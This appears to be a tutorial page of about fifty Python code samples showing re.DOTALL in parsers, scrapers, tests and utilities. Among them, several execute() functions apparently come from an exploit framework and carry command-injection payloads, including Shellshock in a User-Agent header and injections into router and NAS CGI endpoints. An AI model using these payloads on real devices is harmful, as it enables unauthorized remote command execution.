Python re module: re.DOTALL example source code
We extracted the following 49 code examples from open-source Python projects to illustrate how to use re.DOTALL.
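As quick orientation before the examples: by default, '.' in a pattern matches any character except a newline; passing re.DOTALL (alias re.S) lets '.' match newlines too, which is what allows the patterns below to span multiple lines. A minimal sketch:

import re

text = "first line\nsecond line"

# Without DOTALL, '.*' cannot cross the newline, so the search fails.
print(re.search(r"first.*second", text))             # None

# With DOTALL, '.' also matches '\n' and the pattern spans both lines.
print(re.search(r"first.*second", text, re.DOTALL))  # <re.Match object; ...>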
def get_action(driver, keyword):
    """get action class corresponding to the keyword in the driver
    """
    drvmod = 'ProductDrivers.' + driver
    drvmodobj = importlib.import_module(drvmod)
    drvfile_methods = inspect.getmembers(drvmodobj, inspect.isroutine)
    main_method = [item[1] for item in drvfile_methods if item[0] == 'main'][0]
    main_src = inspect.getsource(main_method)
    pkglstmatch = re.search(r'package_list.*=.*\[(.*)\]', main_src, re.MULTILINE | re.DOTALL)
    pkglst = pkglstmatch.group(1).split(',')
    for pkg in pkglst:
        pkgobj = importlib.import_module(pkg)
        pkgdir = os.path.dirname(pkgobj.__file__)
        action_modules = [pkg+'.'+name for _, name, _ in pkgutil.iter_modules([pkgdir])]
        action_module_objs = [importlib.import_module(action_module) for action_module in action_modules]
        for action_module_obj in action_module_objs:
            for action_class in inspect.getmembers(action_module_obj, inspect.isclass):
                for func_name in inspect.getmembers(action_class[1], inspect.isroutine):
                    if keyword == func_name[0]:
                        return action_class[1]
    return None
def safe_text_for_markdown(text):
    """Clean the text using bleach but keep certain Markdown sections.

    Markdown code ie ` or ``` combos. For single `, do not allow line breaks between the tag.
    Quotes ie '> ' which bleach would clean up.
    """
    code_blocks, text = code_blocks_add_markers(text)
    # Store quotes next
    text = re.sub(r"(^> )", "%%safe_quote_in_start%%", text)
    text = re.sub(r"(\n> )", "%%safe_quote_in_new_line%%", text, flags=re.DOTALL)
    # Nuke all html, scripts, etc
    text = bleach.clean(text or "")
    # Return quotes
    text = text.replace("%%safe_quote_in_start%%", "> ")
    text = text.replace("%%safe_quote_in_new_line%%", "\n> ")
    text = code_blocks_restore(code_blocks, text)
    return text
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
    try:
        if url == None: return

        result = client.request(url)
        # can't use the dom parser here because the HTML is bugged: the div is not closed
        result = re.findall('<ul class="episodios">(.*?)</ul>', result, re.MULTILINE | re.DOTALL)
        for item in result:
            season_episodes = re.findall('<li>(.*?)</li>', item, re.MULTILINE | re.DOTALL)
            for row in season_episodes:
                s = client.parseDOM(row, 'div', attrs={'class': 'numerando'})[0].split('x')
                season_found = s[0].strip()
                episode_found = s[1].strip()
                if(season_found != season):
                    break
                if episode_found == episode:
                    return client.parseDOM(row, 'a', ret='href')[0]
    except:
        return
def __search(self, titles, year):
    try:
        r = urllib.urlencode({'keyword': titles[0]})
        r = client.request(urlparse.urljoin(self.base_link, self.search_link), XHR=True, post=r)

        t = [cleantitle.get(i) for i in set(titles) if i]
        y = ['%s' % str(year), '%s' % str(int(year) + 1), '%s' % str(int(year) - 1), '0']

        r = json.loads(r)
        r = [(i['link'], re.sub('<.+?>|</.+?>', '', i['title'])) for i in r if 'title' in i and 'link' in i]
        r = [(i[0], i[1], re.findall('(.+?)\s*Movie \d+:.+?$', i[1], re.DOTALL)) for i in r]
        r = [(i[0], i[2][0] if len(i[2]) > 0 else i[1]) for i in r]
        r = [(i[0], i[1], re.findall('(.+?) \((\d{4})\)?', i[1])) for i in r]
        r = [(i[0], i[2][0][0] if len(i[2]) > 0 else i[1], i[2][0][1] if len(i[2]) > 0 else '0') for i in r]
        r = sorted(r, key=lambda i: int(i[2]), reverse=True)  # with year > no year
        r = [i[0] for i in r if cleantitle.get(i[1]) in t and i[2] in y][0]

        return source_utils.strip_domain(r)
    except:
        return
def remove_cpp_comment(code):
    def blotOutNonNewlines(strIn):  # Return a string containing only the newline chars contained in strIn
        return "" + ("\n" * strIn.count('\n'))

    def replacer(match):
        s = match.group(0)
        if s.startswith('/'):  # Matched string is //...EOL or /*...*/ ==> Blot out all non-newline chars
            return blotOutNonNewlines(s)
        else:  # Matched string is '...' or "..." ==> Keep unchanged
            return s

    pattern = re.compile(
        r'//.*?$|/\*.*?\*/|\'(?:\\.|[^\\\'])*\'|"(?:\\.|[^\\"])*"',
        re.DOTALL | re.MULTILINE
    )
    return re.sub(pattern, replacer, code)
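A short usage sketch (my own illustration, assuming import re and the function above are in scope): re.DOTALL lets the /* ... */ alternative cross line breaks, re.MULTILINE keeps $ anchored to each line end for // comments, and string literals are matched as their own alternative so their contents survive:

src = '''int x = 1; // trailing comment
/* multi-line
   comment */ char *s = "not // a comment";'''
print(remove_cpp_comment(src))
# Both comments are blotted out (their newlines preserved); the string literal is kept.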
#remove non ASCII chars
def str_flags_to_int(str_flags):
    flags = 0
    if "i" in str_flags:
        flags |= re.IGNORECASE
    if "l" in str_flags:
        flags |= re.LOCALE
    if "m" in str_flags:
        flags |= re.MULTILINE
    if "s" in str_flags:
        flags |= re.DOTALL
    if "u" in str_flags:
        flags |= re.UNICODE
    if "x" in str_flags:
        flags |= re.VERBOSE
    return flags
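For illustration (not part of the original project), a quick round trip showing how the single-letter codes map onto the re constants; these are the same letters that _encode_regex below writes out:

flags = str_flags_to_int("ms")
assert flags == re.MULTILINE | re.DOTALL
assert flags & re.DOTALL   # "s" is the single-line/DOTALL option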
def _encode_regex(name, value, dummy0, dummy1):
    """Encode a python regex or bson.regex.Regex."""
    flags = value.flags
    # Python 2 common case
    if flags == 0:
        return b"\x0B" + name + _make_c_string_check(value.pattern) + b"\x00"
    # Python 3 common case
    elif flags == re.UNICODE:
        return b"\x0B" + name + _make_c_string_check(value.pattern) + b"u\x00"
    else:
        sflags = b""
        if flags & re.IGNORECASE:
            sflags += b"i"
        if flags & re.LOCALE:
            sflags += b"l"
        if flags & re.MULTILINE:
            sflags += b"m"
        if flags & re.DOTALL:
            sflags += b"s"
        if flags & re.UNICODE:
            sflags += b"u"
        if flags & re.VERBOSE:
            sflags += b"x"
        sflags += b"\x00"
        return b"\x0B" + name + _make_c_string_check(value.pattern) + sflags
def run(cls):
    """Check variables."""
    project = __import__(IMPORT, fromlist=[''])
    for expected, var in [('@Robpol86', '__author__'), (LICENSE, '__license__'), (VERSION, '__version__')]:
        if getattr(project, var) != expected:
            raise SystemExit('Mismatch: {0}'.format(var))

    # Check changelog.
    if not re.compile(r'^%s - \d{4}-\d{2}-\d{2}[\r\n]' % VERSION, re.MULTILINE).search(readme()):
        raise SystemExit('Version not found in readme/changelog file.')

    # Check tox.
    if INSTALL_REQUIRES:
        contents = readme('tox.ini')
        section = re.compile(r'[\r\n]+install_requires =[\r\n]+(.+?)[\r\n]+\w', re.DOTALL).findall(contents)
        if not section:
            raise SystemExit('Missing install_requires section in tox.ini.')
        in_tox = re.findall(r' ([^=]+)==[\w\d.-]+', section[0])
        if INSTALL_REQUIRES != in_tox:
            raise SystemExit('Missing/unordered pinned dependencies in tox.ini.')
def strip_powershell_comments(data):
    """
    Strip block comments, line comments and empty lines from a PowerShell source file.
    """
    # strip block comments
    strippedCode = re.sub(re.compile('<#.*?#>', re.DOTALL), '', data)

    # strip blank lines and lines starting with #
    # noinspection PyPep8
    strippedCode = "\n".join([line for line in strippedCode.split('\n')
                              if ((line.strip() != '') and (not line.strip().startswith("#")))])

    # TODO: strip comments at the end of lines
    return strippedCode
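A hypothetical input showing the effect (assuming the function above is in scope); re.DOTALL is what lets '<#.*?#>' consume a block comment spanning several lines:

ps_source = "<# block\ncomment #>\nWrite-Host 'hi'\n# line comment\n"
print(strip_powershell_comments(ps_source))   # -> Write-Host 'hi'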
def helper(self, term_instance):
    """
    Called at the start of a WAV file capture. Calculates the length of the
    file and modifies `self.re_capture` with laser precision.
    """
    data = term_instance.capture
    self.wav_header = struct.unpack(
        '4si4s4sihhiihh4si', self.re_wav_header.match(data).group())
    self.wav_length = self.wav_header[1] + 8
    if not self.sent_message:
        channels = "mono"
        if self.wav_header[6] == 2:
            channels = "stereo"
        if self.wav_length != self.wav_header[12] + 44:
            # Corrupt WAV file
            message = _("WAV File is corrupted: Header data mismatch.")
            term_instance.send_message(message)
            term_instance.cancel_capture = True
        message = _("WAV File: %skHz (%s)" % (self.wav_header[7], channels))
        term_instance.send_message(message)
        self.sent_message = True
    # Update the capture regex with laser precision:
    self.re_capture = re.compile(
        b'(RIFF....WAVE.{%s})' % (self.wav_length-12), re.DOTALL)
def ParseWhois_INT(self):
    int_contacts = (
        {"page_field": "Registrant", "rec_field": "registrant"},
        {"page_field": "Administrative Contact", "rec_field": "administrative"},
        {"page_field": "Technical Contact", "rec_field": "technical"})
    page = string.replace(self.page, "\r\n", "\n")
    for contact in int_contacts:
        page_field = contact['page_field']
        s = "%s:(.*)\n\W" % page_field
        m = re.search(s, page, re.DOTALL)
        #if m: print m.group(1)
        print "-------------------"
##
## ----------------------------------------------------------------------
##
##
## ----------------------------------------------------------------------
##
def __init__(self, pattern, markdown_instance=None):
    """
    Create an instance of an inline pattern.

    Keyword arguments:

    * pattern: A regular expression that matches a pattern
    """
    self.pattern = pattern
    self.compiled_re = re.compile("^(.*?)%s(.*)$" % pattern,
                                  re.DOTALL | re.UNICODE)

    # Api for Markdown to pass safe_mode into instance
    self.safe_mode = False
    if markdown_instance:
        self.markdown = markdown_instance
def chainReplace(toRegex, toValue, toArray):
    # TODO clean up so that the input is headers+body and it's called only once
    # TODO support encoding, including URL encode
    isBody = len(toArray) == 1
    if toRegex:
        # BUG FIX: Geoff reported that if the regex ends at the newline on the last header,
        # the regex fails. Hacky solution is to add extra newlines before the regex search
        # and remove them after.
        to = "\r\n".join(toArray) + "\r\n\r\n"
        match = re.search(toRegex, to, re.DOTALL)
        if match and len(match.groups()):
            ret = (to[0:match.start(1)] + toValue + to[match.end(1):])
            if ret[-4:] == "\r\n\r\n":
                ret = ret[:-4]
            if isBody:
                return [ret]
            else:
                return ret.split("\r\n")
    return toArray
## Method to replace custom special types in messages
def test_image_required(self, capfd):
    """
    When the main function is given no image argument, it should exit with
    a return code of 2 and inform the user of the missing argument.
    """
    with ExpectedException(SystemExit, MatchesStructure(code=Equals(2))):
        main(['--tag', 'abc'])

    out, err = capfd.readouterr()
    assert_that(out, Equals(''))

    # More useful error message added to argparse in Python 3
    if sys.version_info >= (3,):
        # Use re.DOTALL so that '.*' also matches newlines
        assert_that(err, MatchesRegex(
            r'.*error: the following arguments are required: image$',
            re.DOTALL
        ))
    else:
        assert_that(
            err, MatchesRegex(r'.*error: too few arguments$', re.DOTALL))
def test_version_semver_requires_argument(self, capfd):
    """
    When the main function is given the `--version-semver` option without
    an argument, an error should be raised.
    """
    with ExpectedException(SystemExit, MatchesStructure(code=Equals(2))):
        main([
            '--version', '1.2.3',
            '--version-semver',
            '--semver-precision',
            '--', 'test-image',
        ])

    out, err = capfd.readouterr()
    assert_that(out, Equals(''))
    assert_that(err, MatchesRegex(
        r'.*error: argument -P/--semver-precision: expected one argument$',
        re.DOTALL
    ))
def execute(self, cmd):
    mark = random_text(32)
    url = "{}:{}/login_handler.php".format(self.target, self.port)
    headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
    data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData";{}; echo {}'.format(cmd, mark)

    response = http_request(method="POST", url=url, headers=headers, data=data)
    if response is None:
        return ""

    if mark in response.text:
        regexp = "(|.+?){}".format(mark)
        res = re.findall(regexp, response.text, re.DOTALL)
        if len(res):
            return res[0]
    return ""
def execute(self, cmd):
    mark = random_text(32)
    url = "{}:{}/ucsm/isSamInstalled.cgi".format(self.target, self.port)
    headers = {
        "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo %s; echo "$(%s)"; echo %s;' % (mark, cmd, mark)
    }

    response = http_request(method="GET", url=url, headers=headers)
    if response is None:
        return ""

    if mark in response.text:
        regexp = "%s(|.+?)%s" % (mark, mark)
        res = re.findall(regexp, response.text, re.DOTALL)
        if len(res):
            return res[0]
    return ""
def execute(self, cmd):
    marker = random_text(32)
    url = "{}:{}{}".format(self.target, self.port, self.path)
    injection = self.valid.replace("{{marker}}", marker).replace("{{cmd}}", cmd)
    headers = {
        self.header: injection,
    }

    response = http_request(method=self.method, url=url, headers=headers)
    if response is None:
        return

    regexp = "{}(.+?){}".format(marker, marker)
    res = re.findall(regexp, response.text, re.DOTALL)
    if len(res):
        return res[0]
    else:
        return ""
def execute(self, cmd):
    url = "{}:{}/web_shell_cmd.gch".format(self.target, self.port)
    headers = {u'Content-Type': u'multipart/form-data'}
    data = {'IF_ACTION': 'apply',
            'IF_ERRORSTR': 'SUCC',
            'IF_ERRORPARAM': 'SUCC',
            'IF_ERRORTYPE': '-1',
            'Cmd': cmd,
            'CmdAck': ''}

    response = http_request(method="POST", url=url, headers=headers, data=data)
    if response is None:
        return ""

    if response.status_code == 200:
        regexp = '<textarea cols="" rows="" id="Frm_CmdAck" class="textarea_1">(.*?)</textarea>'
        res = re.findall(regexp, response.text, re.DOTALL)
        if len(res):
            return res[0]
    return ""
def execute(self, cmd):
    mark = random_text(32)
    url = "{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo {};".format(self.target, self.port, cmd, mark)

    response = http_request(method="GET", url=url)
    if response is None:
        return ""

    if mark in response.text:
        regexp = "(|.+?){}".format(mark)
        res = re.findall(regexp, response.text, re.DOTALL)
        if len(res):
            return res[0]
    return ""
def remove_stack_traces(out):
    # this regexp taken from Python 2.5's doctest
    traceback_re = re.compile(r"""
        # Grab the traceback header. Different versions of Python have
        # said different things on the first traceback line.
        ^(?P<hdr> Traceback\ \(
            (?: most\ recent\ call\ last
            |   innermost\ last
            ) \) :
        )
        \s* $                   # toss trailing whitespace on the header.
        (?P<stack> .*?)         # don't blink: absorb stuff until...
        ^(?=\w)                 # a line *starts* with alphanum.
        .*?(?P<exception> \w+ ) # exception name
        (?P<msg> [:\n] .*)      # the rest
        """, re.VERBOSE | re.MULTILINE | re.DOTALL)
    blocks = []
    for block in blankline_separated_blocks(out):
        blocks.append(traceback_re.sub(r"\g<hdr>\n...\n\g<exception>\g<msg>", block))
    return "".join(blocks)
def _parse_book_info(html):
    """Parse the book fields (author, press, publish date, price) out of the page.

    :param html(string): the html of the book detail page
    """
    end_flag = 'END_FLAG'
    html = html.replace('<br>', end_flag)
    html = html.replace('<br/>', end_flag)
    doc = lxml.html.fromstring(html)
    text = doc.text_content()
    pattern = r'{}[:：](.*?){}'
    result = dict()
    for key, column in [
            ('author', '作者'),
            ('press', '出版社'),
            ('publish_date', '出版年'),
            ('price', '定价')]:
        result[key] = re.search(pattern.format(column, end_flag),
                                text,
                                re.I | re.DOTALL).group(1).strip()
    return result
def fprocess(infilep, outfilep):
    """
    Scans an input file for LA equations between double square brackets,
    e.g. [[ M3_mymatrix = M3_anothermatrix^-1 ]], and replaces the expression
    with a comment containing the equation followed by nested function calls
    that implement the equation as C code. A trailing semicolon is appended.
    The equation within [[ ]] should NOT end with a semicolon as that will raise
    a ParseException. However, it is ok to have a semicolon after the right brackets.

    Other text in the file is unaltered.

    The arguments are file objects (NOT file names) opened for reading and
    writing, respectively.
    """
    pattern = r'\[\[\s*(.*?)\s*\]\]'
    eqn = re.compile(pattern, re.DOTALL)
    s = infilep.read()

    def parser(mo):
        ccode = parse(mo.group(1))
        return "/* %s */\n%s;\nLAParserBufferReset();\n" % (mo.group(1), ccode)

    content = eqn.sub(parser, s)
    outfilep.write(content)
##-----------------------------------------------------------------------------------
def DownloadSetting(url):
    list = []
    try:
        req = urllib2.Request(url)
        req.add_header('User-Agent', 'VAS')
        response = urllib2.urlopen(req)
        link = response.read()
        response.close()
        xx = re.compile('<td><a href="(.+?)">(.+?)</a></td>.*?<td>(.+?)</td>', re.DOTALL).findall(link)
        for link, name, date in xx:
            print link, name, date
            prelink = ''
            if not link.startswith("http://"):
                prelink = url.replace('asd.php', '')
            list.append((date, name, prelink + link))
    except:
        print "ERROR DownloadSetting %s" % (url)
    return list
def suffix_map(par, job_suffix_dict, last_suffix_dict):
    for key in last_suffix_dict.keys():
        par = par.replace('{Suffix:' + key + '}', ' '.join(last_suffix_dict[key]))
    suffix_replacement_single = re.compile("\\{Suffix:(\\d+)-(.*?)\\}", re.IGNORECASE | re.DOTALL)
    for suf_item in re.findall(suffix_replacement_single, par):
        job_step = int(suf_item[0])
        if job_step in job_suffix_dict.keys() and suf_item[1] in job_suffix_dict[job_step].keys():
            par = par.replace('{Suffix:' + suf_item[0] + '-' + suf_item[1] + '}',
                              ' '.join(job_suffix_dict[job_step][suf_item[1]]))
    suffix_replacement_single = re.compile("\\{Suffix:(\\d+)-(.*?)-(\\d+)\\}", re.IGNORECASE | re.DOTALL)
    for suf_item in re.findall(suffix_replacement_single, par):
        job_step = int(suf_item[0])
        file_order = int(suf_item[2]) - 1
        if job_step in job_suffix_dict.keys() and suf_item[1] in job_suffix_dict[job_step].keys() \
                and file_order < len(job_suffix_dict[job_step][suf_item[1]]):
            par = par.replace('{Suffix:' + suf_item[0] + '-' + suf_item[1] + '-' + suf_item[2] + '}',
                              job_suffix_dict[job_step][suf_item[1]][file_order])
    return par
def checked_call(fn, ctx, *args):
    res = fn(ctx, *args)
    if not ctx.has_error:
        return res
    type_str = ffi.string(ctx.error_type).decode('utf8')
    if ctx.error_display != ffi.NULL:
        msg = ffi.string(ctx.error_display).decode('utf8').replace('\n', ' ')
    else:
        msg = None
    err_type = EXCEPTION_MAP.get(type_str)
    if err_type is FstError:
        if ctx.error_description != ffi.NULL:
            desc_str = ffi.string(ctx.error_description).decode('utf8')
        else:
            desc_str = None
        enum_val = re.match(r'(\w+)\(.*?\)', desc_str, re.DOTALL).group(1)
        err_type = EXCEPTION_MAP.get("{}::{}".format(type_str, enum_val))
        if err_type is None:
            msg = "{}: {}".format(enum_val, msg)
    if err_type is None:
        err_type = FstError
    raise err_type(msg)
def cache_call_signatures(evaluator, bracket_leaf, code_lines, user_pos):
    """This function calculates the cache key."""
    index = user_pos[0] - 1

    before_cursor = code_lines[index][:user_pos[1]]
    other_lines = code_lines[bracket_leaf.start_pos[0]:index]
    whole = '\n'.join(other_lines + [before_cursor])
    before_bracket = re.match(r'.*\(', whole, re.DOTALL)

    module_path = bracket_leaf.get_parent_until().path
    if module_path is None:
        yield None  # Don't cache!
    else:
        yield (module_path, before_bracket, bracket_leaf.start_pos)
    yield evaluate_goto_definition(
        evaluator,
        bracket_leaf.get_previous_leaf()
    )
def setup_module():
    import cffi.verifier
    cffi.verifier.cleanup_tmpdir()
    #
    # check that no $ sign is produced in the C file; it used to be the
    # case that anonymous enums would produce '$enum_$1', which was
    # used as part of a function name. GCC accepts such names, but it's
    # apparently non-standard.
    _r_comment = re.compile(r"/\*.*?\*/|//.*?$", re.DOTALL | re.MULTILINE)
    _r_string = re.compile(r'\".*?\"')

    def _write_source_and_check(self, file=None):
        base_write_source(self, file)
        if file is None:
            f = open(self.sourcefilename)
            data = f.read()
            f.close()
            data = _r_comment.sub(' ', data)
            data = _r_string.sub('"skipped"', data)
            assert '$' not in data

    base_write_source = cffi.verifier.Verifier._write_source
    cffi.verifier.Verifier._write_source = _write_source_and_check
def add_head(text):
    """Add head html from template """
    head = open(PATH_TO_TEMPLATE_HTML).read()
    head = head.replace('{{ url_index }}', PATH_TO_HTML + '/' + 'index.html')
    head = head.replace('href="img/', 'href="' + PATH_TO_TEMPLATE + '/img/')
    head = head.replace('="lib/', '="' + PATH_TO_TEMPLATE + '/lib/')
    head = head.replace('="css/', '="' + PATH_TO_TEMPLATE + '/css/')
    head = head.replace('="js/', '="' + PATH_TO_TEMPLATE + '/js/')
    # remove demo content
    head = re.sub(r'<!-- start of demo -->.*<!-- end of demo -->',
                  r'', head, flags=re.M | re.DOTALL)
    return head + text

    #head_new = ''
    # for l in head.split('\n'):
    #     if l.find('href="http://') > -1 or l.find('src="http://') > -1 or l.find('href="#') > -1:
    #         head_new += l
    #     else:
    #         l = l.replace('href=', 'href="' + PATH_TO_TEMPLATE + '"')
    #         l = l.replace('src=', 'src="' + PATH_TO_TEMPLATE + '"')
    #         head_new += l
    # return head + text
def _real_extract(self, url):
    mobj = re.match(self._VALID_URL, url)
    music_id = mobj.group('id')
    webpage = self._download_webpage(url, music_id)
    title = self._html_search_regex(
        r'<div id="single_sample_header">.*?<a href="#">(.+?)</a>',
        webpage, 'music title', flags=re.DOTALL)
    description = self._html_search_regex(
        r'<div id="sound_description">(.*?)</div>', webpage, 'description',
        fatal=False, flags=re.DOTALL)

    return {
        'id': music_id,
        'title': title,
        'url': self._og_search_property('audio', webpage, 'music url'),
        'uploader': self._og_search_property('audio:artist', webpage, 'music uploader'),
        'description': description,
    }
def _title_and_entries(self, list_id, base_url):
    for pagenum in itertools.count(1):
        page_url = self._page_url(base_url, pagenum)
        webpage = self._download_webpage(
            page_url, list_id,
            'Downloading page %s' % pagenum)

        if pagenum == 1:
            webpage = self._login_list_password(page_url, list_id, webpage)
            yield self._extract_list_title(webpage)

        for video_id in re.findall(r'id="clip_(\d+?)"', webpage):
            yield self.url_result('https://vimeo.com/%s' % video_id, 'Vimeo')

        if re.search(self._MORE_PAGES_INDICATOR, webpage, re.DOTALL) is None:
            break
def find_links(file):
    """Find all markdown links in a file object.

    Yield (lineno, regexmatch) tuples.
    """
    # don't yield same link twice
    seen = set()

    # we need to loop over the file two lines at a time to support
    # multi-line (actually two-line) links, so this is kind of a mess
    firsts, seconds = itertools.tee(file)
    next(seconds)  # first line is never second line

    # we want 1-based indexing instead of 0-based and one-line links get
    # caught from linepair[1], so we need to start at two
    for lineno, linepair in enumerate(zip(firsts, seconds), start=2):
        lines = linepair[0] + linepair[1]
        for match in re.finditer(_LINK_REGEX, lines, flags=re.DOTALL):
            if match.group(0) not in seen:
                seen.add(match.group(0))
                yield match, lineno
def writeJson(self, inner_path, data):
    content = json.dumps(data, indent=1, sort_keys=True)

    # Make it a little more compact by removing unnecessary white space
    def compact_list(match):
        return "[ " + match.group(1).strip() + " ]"

    def compact_dict(match):
        return "{ " + match.group(1).strip() + " }"

    content = re.sub("\[([^,\{\[]{10,100}?)\]", compact_list, content, flags=re.DOTALL)
    content = re.sub("\{([^,\[\{]{10,100}?)\}", compact_dict, content, flags=re.DOTALL)

    # Write to disk
    self.write(inner_path, content)
# Get file size
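In isolation, the list-compacting substitution looks like this (my own sketch with hypothetical data; note the {10,100} length bound and the ban on commas, so only short single-item spans collapse onto one line):

import json, re

def compact_list(match):
    return "[ " + match.group(1).strip() + " ]"

content = json.dumps({"files": ["content.json"]}, indent=1)
content = re.sub("\[([^,\{\[]{10,100}?)\]", compact_list, content, flags=re.DOTALL)
print(content)   # {\n "files": [ "content.json" ]\n}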
def getOfflineMediaList(self, folderName=False, title=False, contentType=7):
    mediaFiles = []
    for r1 in re.finditer('\{(.*?)\"spaces\"\:', entryS, re.DOTALL):
        entry = r1.group(1)
        media = self.getMediaPackage(entry, folderName=folderName, contentType=contentType, fanart=folderFanart, icon=folderIcon)
        if media is not None:
            mediaFiles.append(media)
    return mediaFiles
##
# retrieve a list of videos, using playback type stream
# parameters: prompt for video quality (optional), cache type (optional)
# returns: list of videos
##
def transform_template(self, obj):
    if obj["name"].startswith("#lst:"):
        article_name = remove_prefix(obj["name"], "#lst:")
        article = self.api.get_content(article_name)
        section_name = obj["params"]["1"]
        begin = r"\<section\s+begin\=[\"']?" + re.escape(section_name) + \
                r"[\"']?\s*\/>"
        end = r"\<section\s+end\=[\"']?" + re.escape(section_name) + \
              r"[\"']?\s*\/\>"
        section = re.search(begin + "(.*)" + end, article, re.DOTALL)
        if section:
            section = section.group(1).strip()
            content = parse_content(self.api, self.title, section)
            return {"type": "included_section", "content": content}
        else:
            message = "section '{}' of '{}' cannot be included" \
                .format(section_name, article_name)
            return {"type": "error", "message": message}
    else:
        raise NotInterested()
def contentMalicious(self, content, goodregex, badregex):
    # First, check for the bad indicators
    if len(badregex) > 0:
        for rx in badregex:
            if re.match(rx, content, re.IGNORECASE | re.DOTALL):
                self.sf.debug("Found to be bad against bad regex: " + rx)
                return True

    # Finally, check for good indicators
    if len(goodregex) > 0:
        for rx in goodregex:
            if re.match(rx, content, re.IGNORECASE | re.DOTALL):
                self.sf.debug("Found to be good against good regex: " + rx)
                return False

    # If nothing was matched, reply None
    self.sf.debug("Neither good nor bad, unknown.")
    return None
# Look up 'query' type sources
def get_action_dirlist(driverpath):
    """ Get the list of action directories
    """
    actions_package_list = []
    try:
        if os.path.isfile(driverpath):
            with open(driverpath, 'r') as fobj:
                drv_text = fobj.read()
            search_string = re.compile('package_list.*=.*\]',
                                       re.DOTALL | re.MULTILINE)
            match = re.search(search_string, drv_text)
            if match:
                match_string = match.group()
                # extract the text within [] and get the list of packages separated by ,
                actions_package_list = re.findall(r'\[(.*)\]', match_string)[0].split(',')
                print "\n actions package list: ", actions_package_list
        else:
            print "file {0} does not exist".format(driverpath)
    except Exception, e:
        print str(e)
    return actions_package_list
def get_action_dirlist(driverpath):
    """ Get the list of action directories """
    actions_package_list = []
    try:
        if os.path.isfile(driverpath):
            lines = []
            with open(driverpath, 'r') as fobj:
                lines = fobj.readlines()
            lines_as_string = ''.join(lines)
            search_string = re.compile(r'package_list.*=.*\]', re.DOTALL | re.MULTILINE)
            match = re.search(search_string, lines_as_string)
            if match:
                match_string = match.group()
                actions_package_list = match_string.split('[')[1].split(']')[0].split(',')
            return actions_package_list
        else:
            print("file {0} does not exist".format(driverpath))
            return actions_package_list
    except Exception as exception:
        print_exception(exception)
    return actions_package_list
def get_history(self, addr):
    out = []
    o = self.listunspent(addr)
    for item in o:
        out.append((item['height'], item['tx_hash']))

    h = self.db_hist.get(addr)
    if h:
        for item in re.findall('.{80}', h, flags=re.DOTALL):
            txi = item[0:32].encode('hex')
            hi = hex_to_int(item[36:40])
            txo = item[40:72].encode('hex')
            ho = hex_to_int(item[76:80])
            out.append((hi, txi))
            out.append((ho, txo))

    # uniqueness
    out = set(out)
    # sort by height then tx_hash
    out = sorted(out)
    return map(lambda x: {'height': x[0], 'tx_hash': x[1]}, out)
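The re.findall('.{80}', h, flags=re.DOTALL) call above is a compact idiom for splitting a string into fixed-width 80-byte records; without DOTALL, any record containing a 0x0a byte would break the alignment. A small sketch with 4-byte records:

import re

data = 'aaaa\nbbbcccc'   # three 4-byte records, one containing '\n'
print(re.findall('.{4}', data, flags=re.DOTALL))   # ['aaaa', '\nbbb', 'cccc']
print(re.findall('.{4}', data))                    # ['aaaa', 'bbbc'] -- misaligned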
def scanner(cls):
    if not getattr(cls, '_scanner', None):
        def h(tpe):
            return lambda sc, tk: cls.Token(tpe, tk)

        cls._scanner = re.Scanner([
            (r"(--|//).*?$", h(cls.LINE_COMMENT)),
            (r"\/\*.+?\*\/", h(cls.BLOCK_COMMENT)),
            (r'"(?:[^"\\]|\\.)*"', h(cls.STRING)),
            (r"'(?:[^'\\]|\\.)*'", h(cls.STRING)),
            (r"\$\$(?:[^\$\\]|\\.)*\$\$", h(cls.STRING)),
            (r";", h(cls.SEMICOLON)),
            (r"\s+", h(cls.WHITESPACE)),
            (r".", h(cls.OTHER))
        ], re.MULTILINE | re.DOTALL)
    return cls._scanner